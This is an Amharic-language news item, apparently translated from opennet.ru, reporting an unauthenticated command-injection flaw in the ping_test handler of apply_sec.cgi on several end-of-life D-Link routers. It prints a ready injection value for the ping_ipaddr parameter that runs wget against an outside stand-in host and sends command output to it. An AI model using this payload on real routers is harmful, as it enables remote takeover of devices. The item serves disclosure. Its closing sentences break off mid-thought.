በዲ-ሊንክ ገመድ አልባ ራውተሮች ውስጥ
የሚገርመው ነገር፣ እንደ ፈርምዌር አዘጋጆቹ፣ የ‹ping_test› ጥሪው መፈፀም ያለበት ከተረጋገጠ በኋላ ብቻ ነው፣ ነገር ግን በእውነቱ ወደ የድር በይነገጽ ውስጥ መግባት ምንም ይሁን ምን በማንኛውም ሁኔታ ይጠራል። በተለይም apply_sec.cgi ስክሪፕት ሲደርሱ እና የ"action=ping_test" ግቤትን ሲያልፉ ስክሪፕቱ ወደ የማረጋገጫ ገጹ ያቀናል፣ነገር ግን በተመሳሳይ ጊዜ ከping_test ጋር የተገናኘውን ተግባር ይፈጽማል። ኮዱን ለማስፈጸም በራሱ በping_test ውስጥ ሌላ ተጋላጭነት ጥቅም ላይ ውሏል፣ ይህም ለሙከራ የተላከውን የአይፒ አድራሻ በትክክል ሳያጣራ ፒንግ መገልገያውን ይጠራል። ለምሳሌ የwget መገልገያውን ለመጥራት እና የ"echo 1234" ትዕዛዝ ውጤቶችን ወደ ውጫዊ አስተናጋጅ ለማስተላለፍ ልክ "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" የሚለውን መለኪያ ብቻ ይጥቀሱ። test.test/?$( echo 1234)"
በሚከተሉት ሞዴሎች ውስጥ የተጋላጭነት መኖሩ በይፋ ተረጋግጧል.
- DIR-655 ከ firmware 3.02b05 ወይም ከዚያ በላይ ያለው;
- DIR-866L ከ firmware 1.03b04 ወይም ከዚያ በላይ;
- DIR-1565 ከ firmware 1.01 ወይም ከዚያ በላይ;
- DIR-652 (ችግር ስላላቸው የጽኑ ትዕዛዝ ስሪቶች ምንም መረጃ አልተሰጠም)
የእነዚህ ሞዴሎች የድጋፍ ጊዜ አስቀድሞ አልፎበታል, ስለዚህ D-Link
በኋላ ላይ ተጋላጭነቱም እንደነበረ ታወቀ
ምንጭ: opennet.ru